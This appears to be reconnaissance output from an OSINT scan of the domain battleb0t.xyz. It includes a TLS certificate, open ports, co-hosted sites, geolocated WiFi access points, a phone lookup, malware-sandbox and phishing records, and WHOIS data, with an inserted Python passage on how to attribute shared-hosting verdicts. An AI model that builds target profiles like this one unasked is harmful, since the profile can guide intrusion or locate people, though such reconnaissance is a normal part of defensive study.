Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 24 04:50:12 2023 GMT
Not After : Jul 23 04:50:11 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:82:cb:77:ee:0a:02:15:cc:55:bf:00:98:6f:a8:
3f:b2:14:d4:9c:d2:64:fd:99:e1:d8:26:89:b8:f1:
dc:22:d0:26:9d:8e:a5:23:7c:46:6d:03:ff:6a:e6:
a2:08:ce:de:84:74:8f:ae:3e:dc:7e:26:40:72:7b:
57:ec:43:06:6a:71:6c:fc:31:f4:5e:75:d1:19:14:
5e:39:a9:c9:25:dc:c7:ab:fb:78:13:e9:b6:dd:4e:
22:f5:46:61:9b:4d:92:18:51:63:9f:47:d1:e0:56:
d2:dd:ee:e2:20:b3:7b:38:70:5e:c4:ce:34:85:6e:
20:54:d9:a0:fd:9c:5b:f3:2b:f0:71:40:e4:40:4b:
1e:0f:24:1b:6d:0c:b5:2f:db:ff:c9:99:df:c5:b7:
e3:7b:82:94:fd:3b:73:58:54:64:ee:2f:77:1b:b4:
c2:f6:38:26:30:8a:32:cc:d3:34:07:56:0c:a8:1d:
b3:55:51:77:90:73:0f:96:7f:80:56:ed:10:db:b0:
4f:75:85:22:ed:37:00:ed:d3:cd:b1:63:f5:f1:51:
be:1d:fc:12:12:48:53:55:50:e7:d9:8d:97:f2:49:
cd:d8:c7:68:76:42:1f:19:5e:47:61:6c:1c:99:ed:
d8:16:c4:32:36:77:d5:1b:79:9e:1e:4e:47:15:7c:
27:6f
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
18:EC:9F:C5:4F:26:93:D3:4A:02:0B:79:BA:BB:F3:33:18:F7:3E:35
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
95:2c:18:1f:d0:91:73:33:88:ab:4e:68:d6:e3:58:9c:45:64:
b3:8a:0d:c0:05:28:dd:e1:2b:f4:06:90:e5:1f:5e:3c:9c:82:
f8:42:f9:9c:fc:f0:39:70:2a:ec:b3:e8:e8:27:a3:e2:22:80:
9f:b5:25:f6:b8:88:47:5f:86:6d:fa:80:87:2b:27:3e:0f:10:
6e:32:3f:e2:3c:74:e0:3c:4f:db:80:e5:a0:7b:df:70:24:e5:
0b:57:3d:66:c3:68:d9:cb:10:13:bf:3d:4b:9b:bd:e4:38:dc:
16:3b:ab:a4:bb:05:4c:21:58:ec:56:01:d3:cd:f7:e4:52:ad:
1c:0c:0e:45:9d:25:b3:ee:43:f3:93:10:64:3c:d1:8d:ef:4c:
a1:a0:46:a0:9c:7a:71:16:74:1d:79:35:f7:b7:75:a9:5d:1a:
70:92:2b:c8:d4:0a:a7:04:cf:3a:2e:08:b5:53:9c:fd:91:52:
6d:bc:96:2f:53:07:7f:1a:15:71:f1:e4:9c:95:b8:03:cb:17:
25:b8:bd:2e:3d:91:c6:72:cb:50:7f:bb:42:cd:87:4e:3f:af:
01:27:cd:29:c4:cc:43:33:bb:f8:a1:ac:9f:c7:0b:d7:f6:39:
18:d3:6f:bb:a0:79:75:5a:d1:c9:35:44:91:1c:7a:a8:9d:4d:
fb:9f:95:2e
| battleb0t.xyz |
| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.31): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Juggernaut (Net ID: 00:0C:41:D7:E4:AF) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Ricos Loft 5 (Net ID: 00:01:9F:34:7B:CC) | 34.0544, -118.244 |
| 2023-05-12 03:09:45 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 136.97.148.34.bc.googleusercontent.com | 34.148.97.136 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Patriots Win (Category: political) https://patriots.win/u/login/ | login |
| 2023-05-12 02:55:11 | Open UDP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:53 | 87.248.157.102 |
| 2023-05-12 03:12:52 | Raw Data from RIRs | No | numverify | 0 | 0 | 3 | 0 | None | {u'international_format': u'+14805058800', u'local_format': u'4805058800', u'number': u'14805058800', u'valid': True, u'line_type': u'landline', u'location': u'Phoenix', u'country_code': u'US', u'carrier': u'', u'country_name': u'United States of America', u'country_prefix': u'+1'} | +14805058800 |
| 2023-05-12 03:28:39 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.160:8443 | 188.114.96.0/24 |
| 2023-05-12 02:50:21 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | {u'count': 50, u'search_terms': [{u'id': u'host', u'value': u'185.199.108.153'}], u'result': [{u'environment_id': 160, u'job_id': u'645d8a88279c2a120702351f', u'analysis_start_time': u'2023-05-12 00:38:33', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'fd3f87723c83f2305810fe23fef4cf445f78d61b1bd01c5ba0f86e6abdd341d0', u'type': None, u'type_short': u'url', u'size': 66}, {u'environment_id': 160, u'job_id': u'645d49f8de4a448d8502e802', u'analysis_start_time': u'2023-05-11 20:03:05', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'caa85587541ac5a6fa3be679888d72e2e42fdcad7692d730bfdac5f1eda53cb8', u'type': None, u'type_short': u'url', u'size': 66}, {u'environment_id': 160, u'job_id': u'645d21c0b499dcb7b70d14f2', u'analysis_start_time': u'2023-05-11 17:11:29', u'vx_family': u'Malicious site', u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'da548ef9df8cab343b3862fc91c34c186e72b4b4c2ea3d2b464bc6043a235960', u'type': None, u'type_short': u'url', u'size': 53}, {u'environment_id': 160, u'job_id': u'645d0f98dcd5664d0b03879a', u'analysis_start_time': u'2023-05-11 15:54:01', u'vx_family': u'Malicious site', u'av_detect': u'33', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'f957cd2858479ac1c3950fe600ab6a011f2955b2cada6371078e83f2d9ce16ca', u'type': None, u'type_short': u'url', u'size': 142}, {u'environment_id': 110, u'job_id': u'645c5e23b4ad9858e30c3320', u'analysis_start_time': u'2023-05-11 
03:16:52', u'vx_family': u'Phishing site', u'av_detect': u'62', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'2b8ddeb1ac7750da80502b1322e14c3de7bb618006fe7ddf37f47b9324d3bb67', u'type': None, u'type_short': u'url', u'size': 72}, {u'environment_id': 110, u'job_id': u'645c5e1fc129a37d29017ae4', u'analysis_start_time': u'2023-05-11 03:16:48', u'vx_family': u'Phishing site', u'av_detect': u'71', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'72bea1bb6678facfbacd6d43b3e50cbf0d128005c52469fd378a2c17b8a9d8e4', u'type': None, u'type_short': u'url', u'size': 66}, {u'environment_id': 110, u'job_id': u'645c5df8abfe193107024f1e', u'analysis_start_time': u'2023-05-11 03:16:09', u'vx_family': u'Phishing site', u'av_detect': u'60', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'72dcf92fdd87135607534fb22cd7cb1030bdce9f3ac073f1de1f62b3a33edf56', u'type': None, u'type_short': u'url', u'size': 69}, {u'environment_id': 110, u'job_id': u'645c5de3e95b4421cb07d72c', u'analysis_start_time': u'2023-05-11 03:15:48', u'vx_family': u'Phishing site', u'av_detect': u'58', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'bdeb520577acc7f04dc5ec8e74234521dc150dedad20f555e3db29d2afeb902f', u'type': None, u'type_short': u'url', u'size': 73}, {u'environment_id': 110, u'job_id': u'645c5de38943312361085a76', u'analysis_start_time': u'2023-05-11 03:15:48', u'vx_family': u'Phishing site', u'av_detect': u'59', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': 
u'6b9cb44f8af65c9c7de7aeefe5df75082005b066e5269a7beab8d9351e8fe0a9', u'type': None, u'type_short': u'url', u'size': 65}, {u'environment_id': 110, u'job_id': u'645c5c6fcf0b25bc970e9ca1', u'analysis_start_time': u'2023-05-11 03:09:36', u'vx_family': u'Phishing site', u'av_detect': u'61', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'be1d588c403275660b01eca90094a469c99c292f3f377a701a37fa0b2226362b', u'type': None, u'type_short': u'url', u'size': 66}, {u'environment_id': 110, u'job_id': u'645c5bf5f586b26472036a15', u'analysis_start_time': u'2023-05-11 03:07:34', u'vx_family': u'Phishing site', u'av_detect': u'61', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'0754c3a617f3c7c89ea46c89c18542dd456aee3a70b9dd31bfc459a66031bbaa', u'type': None, u'type_short': u'url', u'size': 71}, {u'environment_id': 110, u'job_id': u'645c5bb295b3d7015b0ad91e', u'analysis_start_time': u'2023-05-11 03:06:26', u'vx_family': u'Phishing site', u'av_detect': u'60', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'6fa5b98ea302c88b5188162b088f9b4e374c799581571973ea6c5651d9040060', u'type': None, u'type_short': u'url', u'size': 62}, {u'environment_id': 110, u'job_id': u'645c5baae95b4421cb07d5e2', u'analysis_start_time': u'2023-05-11 03:06:18', u'vx_family': u'Phishing site', u'av_detect': u'61', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'c89f9c848a950df9536d3df2ceafaec95f0aa29af4b956a2bfd1dfbbd379cb17', u'type': None, u'type_short': u'url', u'size': 86}, {u'environment_id': 110, u'job_id': u'645c5b9ec8c83d3b240e95c6', u'analysis_start_time': u'2023-05-11 03:06:07', 
u'vx_family': u'Phishing site', u'av_detect': u'61', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'2b41abf0a1ffd0bfbf700bb5eee65e98fb627cb92c9a148bc3d4acd1a6b24c6e', u'type': None, u'type_short': u'url', u'size': 69}, {u'environment_id': 160, u'job_id': u'645c346964201940820bd22f', u'analysis_start_time': u'2023-05-11 00:18:49', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'6ff193a6ca9551050e9c92179433950b4a1e5c440e0b35cab4b36916f38ab19f', u'type': None, u'type_short': u'url', u'size': 49}, {u'environment_id': 100, u'job_id': u'645bdba7396080d9fe10009e', u'analysis_start_time': u'2023-05-10 18:00:07', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'8163eb8a3e42f3967f5831043d6e16ebb5ed541ef09bad6181080ef6e0d7bd2a', u'type': None, u'type_short': u'url', u'size': 47}, {u'environment_id': 100, u'job_id': u'645b9d1743bfaa77c207d7d5', u'analysis_start_time': u'2023-05-10 13:33:11', u'vx_family': None, u'av_detect': u'50', u'environment_description': u'Windows 7 32 bit', u'threat_score': 100, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'822a90d8cb0a1a10355a4a70a196e8630d132c645f14cbb143b3f9b7394a251f', u'type': None, u'type_short': u'url', u'size': 114}, {u'environment_id': 110, u'job_id': u'645ae4e1346528d7b70ca2e9', u'analysis_start_time': u'2023-05-10 00:27:14', u'vx_family': u'Phishing site', u'av_detect': u'59', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'ca308e63c510b0b503331cc7778db986b057b684b3dbaa752e4f62cb13664b77', u'type': None, 
u'type_short': u'url', u'size': 62}, {u'environment_id': 110, u'job_id': u'645ae36a67851ac2340e520d', u'analysis_start_time': u'2023-05-10 00:20:58', u'vx_family': u'Phishing site', u'av_detect': u'60', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'9732e24d121e342e55deabd13611e857c769c96da9717e6d7ebc87449f2a7905', u'type': None, u'type_short': u'url', u'size': 57}, {u'environment_id': 110, u'job_id': u'645ad4ea367c0ebd57074ef9', u'analysis_start_time': u'2023-05-09 23:19:06', u'vx_family': u'Phishing site', u'av_detect': u'60', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'a91d30a9dfbf18fc164f18e29c383f3b3964ac705c585938d8d588d02f3da688', u'type': None, u'type_short': u'url', u'size': 66}, {u'environment_id': 110, u'job_id': u'645ad31c5702e95bf3033576', u'analysis_start_time': u'2023-05-09 23:11:24', u'vx_family': u'Phishing site', u'av_detect': u'62', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'e81a2290a3986847ba37b34e8a5c695786daf2ff2a13d86708b03f6647d220ab', u'type': None, u'type_short': u'url', u'size': 62}, {u'environment_id': 100, u'job_id': u'645aa20e7a292c0be70b0612', u'analysis_start_time': u'2023-05-09 19:42:07', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'fac0f6b5c9cc17d9e85e803349fbdcb7dd616c0192e797952d500bc5bd892fe7', u'type': None, u'type_short': u'url', u'size': 141}, {u'environment_id': 160, u'job_id': u'645a76cea2d0c5300e066333', u'analysis_start_time': u'2023-05-09 16:37:35', u'vx_family': None, u'av_detect': u'33', u'environment_description': u'Windows 10 64 bit', 
u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'c1370cd545c8d3458c340bf48e48850af74876898cb8557ed1a692c1d7654113', u'type': None, u'type_short': u'url', u'size': 123}, {u'environment_id': 100, u'job_id': u'6459c8ee434bd90ac20239bb', u'analysis_start_time': u'2023-05-09 04:15:43', u'vx_family': None, u'av_detect': u'0', u'environment_d | 185.199.108.153 |
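The Hybrid Analysis row above returns dozens of sandbox verdicts for the host 185.199.108.153, most of them "Phishing site". The point a practitioner needs before pivoting on that IP is that this page's own Co-Hosted Site rows and the `server: GitHub.com` response header show it is a shared GitHub Pages address, so verdicts collected for the IP belong to many unrelated tenants and cannot be attributed to any single hostname. The following Python is an added worked example, not SpiderFoot's or Hybrid Analysis's code: it aggregates host-search records shaped like the `result` entries in that row and emits the attribution caveat. `SAMPLE_RESULTS` and `SAMPLE_COHOSTED` are constructed for the example (sha256 values are placeholders), and `shared_threshold` is a hypothetical cut-off.

```python
from collections import Counter
from dataclasses import dataclass, field


# Constructed sample shaped like the `result` entries in the Hybrid Analysis
# row above (same field names and value types; sha256 values are placeholders).
SAMPLE_RESULTS = [
    {"environment_id": 160, "vx_family": None, "av_detect": "0",
     "threat_score": None, "verdict": "no specific threat", "sha256": "a" * 64},
    {"environment_id": 110, "vx_family": "Phishing site", "av_detect": "62",
     "threat_score": 100, "verdict": "malicious", "sha256": "b" * 64},
    {"environment_id": 110, "vx_family": "Phishing site", "av_detect": "59",
     "threat_score": 100, "verdict": "malicious", "sha256": "c" * 64},
    {"environment_id": 100, "vx_family": None, "av_detect": "50",
     "threat_score": 100, "verdict": "suspicious", "sha256": "d" * 64},
]

# Constructed co-hosting evidence for the same pivot IP, in the spirit of the
# "Co-Hosted Site" rows on this page (distinct sites answering on one address).
SAMPLE_COHOSTED = {"eliaspinheironeto.github.io", "01001101ck.github.io",
                   "nickcher.github.io"}


@dataclass
class HostSummary:
    total: int
    verdicts: dict = field(default_factory=dict)   # verdict -> count
    families: dict = field(default_factory=dict)   # vx_family -> count
    max_av_detect: int = 0                          # highest AV hit percentage seen
    shared_hosting: bool = False                    # pivot IP serves unrelated sites


def _av_detect(rec):
    """av_detect arrives as a string ("62") and may be missing; normalise to int."""
    try:
        return int(rec.get("av_detect") or 0)
    except ValueError:
        return 0


def summarize_host(results, cohosted_names, shared_threshold=2):
    """Aggregate Hybrid Analysis host-search results into a HostSummary.

    shared_threshold is a hypothetical cut-off: at or above this many distinct
    co-hosted names the IP is treated as shared infrastructure.
    """
    verdicts = Counter(r.get("verdict") or "unknown" for r in results)
    families = Counter(r["vx_family"] for r in results if r.get("vx_family"))
    max_av = max((_av_detect(r) for r in results), default=0)
    shared = len(set(cohosted_names)) >= shared_threshold
    return HostSummary(total=len(results), verdicts=dict(verdicts),
                       families=dict(families), max_av_detect=max_av,
                       shared_hosting=shared)


def attribution_advice(summary):
    """Turn the summary into the caveat an analyst needs before pivoting."""
    malicious = summary.verdicts.get("malicious", 0)
    if summary.shared_hosting:
        return ("shared-hosting IP: %d/%d malicious verdicts belong to other "
                "tenants unless tied to the target hostname; pivot on the "
                "domain or certificate, not the IP" % (malicious, summary.total))
    if malicious:
        return "dedicated IP with %d malicious verdicts: treat as an indicator" % malicious
    return "no malicious verdicts on this host"


if __name__ == "__main__":
    s = summarize_host(SAMPLE_RESULTS, SAMPLE_COHOSTED)
    print(s)
    print(attribution_advice(s))
```

Run against the real row, the same aggregation would show the "Phishing site" family dominating while the co-hosting evidence (several unrelated github.io sites, a Fastly ASN in the PhishStats row) marks the IP as shared; the actionable pivot is therefore the hostname or the SAN in a certificate, not the address.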
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | NETGEAR (Net ID: 00:0B:7D:08:41:CB) | 39.0469, -77.4903 |
| 2023-05-12 03:32:25 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.13:80 | 188.114.97.0/24 |
| 2023-05-12 02:45:31 | Raw Data from RIRs | No | PhishStats | 0 | 0 | 2 | 0 | None | [{u'page_text': u' ', u'domain': None, u'virus_total': None, u'n_times_seen_ip': None, u'abuse_contact': None, u'ip': u'185.199.110.153', u'google_safebrowsing': None, u'threat_crowd': None, u'n_times_seen_domain': None, u'alexa_rank_host': None, u'id': 2255774, u'city': u'', u'abuse_ch_malware': None, u'countrycode': u'NL', u'title': u'Site not found \xb7 GitHub Pages', u'ssl_subject': None, u'technology': None, u'date_update': u'2020-12-08T01:50:24.000Z', u'zipcode': u'', u'alexa_rank_domain': None, u'score': None, u'vulns': None, u'latitude': u'52', u'regionname': u'', u'hash': u'05d383e42f69258d635e6789e2a3163ab4e15be5920ead730c050aefc2f422d5', u'threat_crowd_subdomain_count': None, u'screenshot': None, u'n_times_seen_host': None, u'ssl_issuer': None, u'domain_registered_n_days_ago': None, u'regioncode': u'', u'host': u'www.mise-a-jour.github.io', u'date': u'2018-06-06T21:16:47.000Z', u'asn': u'AS54113', u'tags': None, u'bgp': u'185.199.108.0/22', u'url': u'http://www.mise-a-jour.github.io/imp/', u'isp': u'FASTLY - Fastly, US', u'longitude': u'4.89950000', u'ports': None, u'countryname': u'Netherlands', u'threat_crowd_votes': None, u'http_server': None, u'tld': u'io', u'os': None, u'http_code': None}] | 185.199.110.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | x-timer: S1683860053.987504,VS0,VE2 | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-ewr18140-EWR", "x-cache": "HIT", "x-github-request-id": "1AD4:4FA0:AFAB37:106D10A:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "47e9025f17d9e6e936d804b3c00d7989ec4a827a", "date": "Fri, 12 May 2023 02:54:12 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "559", "x-timer": "S1683860053.987504,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 2WIRE623 (Net ID: 00:00:85:F5:03:9F) | 37.7813933,-122.3918002 |
| 2023-05-12 02:46:01 | Physical Location | No | AbstractAPI | 1 | 0 | 3 | 0 | None | North Charleston, South Carolina, 29415, United States, North America | 104.196.30.220 |
| 2023-05-12 03:01:29 | Web Server | No | Tool - WhatWeb | 0 | 0 | 2 | 0 | None | cloudflare | fluid.battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MobileInternet (Net ID: 00:02:B3:AE:E3:AC) | 50.1188, 8.6843 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:110 | 87.248.157.102 |
| 2023-05-12 03:00:58 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 01001101ck.github.io | 185.199.111.153 |
| 2023-05-12 02:55:05 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 13335 | 188.114.97.1 |
| 2023-05-12 02:46:17 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Collaborative intelligence - Collaborative intelligence characterizes multi-agent, distributed systems where each agent, human or machine, is autonomously contributing to a problem solving network. Collaborative autonomy of organisms in their ecosystems makes evolution possible. | cdn-185-199-111-153.github.com |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | WLAN (Net ID: 00:01:24:F3:FD:65) | 34.0544, -118.244 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | home (Net ID: 00:06:25:61:49:C4) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:31:27 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com | Domain Name: nom-nom.link
Registry Domain ID: DO_219392db582b99394c2ad318b07284eb-UR
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com
Updated Date: 2022-10-23T13:11:02.954Z
Creation Date: 2022-09-09T13:47:20.593Z
Registry Expiry Date: 2023-09-09T13:47:20.593Z
Registrar: NAMECHEAP
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Billing ID: REDACTED FOR PRIVACY
Billing Name: REDACTED FOR PRIVACY
Billing Organization: REDACTED FOR PRIVACY
Billing Street: REDACTED FOR PRIVACY
Billing City: REDACTED FOR PRIVACY
Billing State/Province: REDACTED FOR PRIVACY
Billing Postal Code: REDACTED FOR PRIVACY
Billing Country: REDACTED FOR PRIVACY
Billing Phone: REDACTED FOR PRIVACY
Billing Fax: REDACTED FOR PRIVACY
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: wesley.ns.cloudflare.com
Name Server: rachel.ns.cloudflare.com
DNSSEC: unsigned
URL of the ICANN RDDS Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:09:16.270Z <<<
For more information on domain status codes, please visit https://icann.org/epp
The WHOIS information provided in this page has been redacted
in compliance with ICANN's Temporary Specification for gTLD
Registration Data.
The data in this record is provided by Uniregistry for informational
purposes only, and it does not guarantee its accuracy. Uniregistry is
authoritative for whois information in top-level domains it operates
under contract with the Internet Corporation for Assigned Names and
Numbers. Whois information from other top-level domains is provided by
a third-party under license to Uniregistry.
This service is intended only for query-based access. By using this
service, you agree that you will use any data presented only for lawful
purposes and that, under no circumstances will you use (a) data
acquired for the purpose of allowing, enabling, or otherwise supporting
the transmission by e-mail, telephone, facsimile or other
communications mechanism of mass unsolicited, commercial advertising
or solicitations to entities other than your existing customers; or
(b) this service to enable high volume, automated, electronic processes
that send queries or data to the systems of any Registrar or any
Registry except as reasonably necessary to register domain names or
modify existing domain name registrations.
Uniregistry reserves the right to modify these terms at any time. By
submitting this query, you agree to abide by this policy. All rights
reserved.
Domain name: nom-nom.link
Registry Domain ID: DO_219392db582b99394c2ad318b07284eb-UR
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2022-09-09T13:47:20.59Z
Registrar Registration Expiration Date: 2023-09-09T13:47:20.59Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 6779e29dade44d91b5a12e78669866ac.protect@withheldforprivacy.com
Name Server: rachel.ns.cloudflare.com
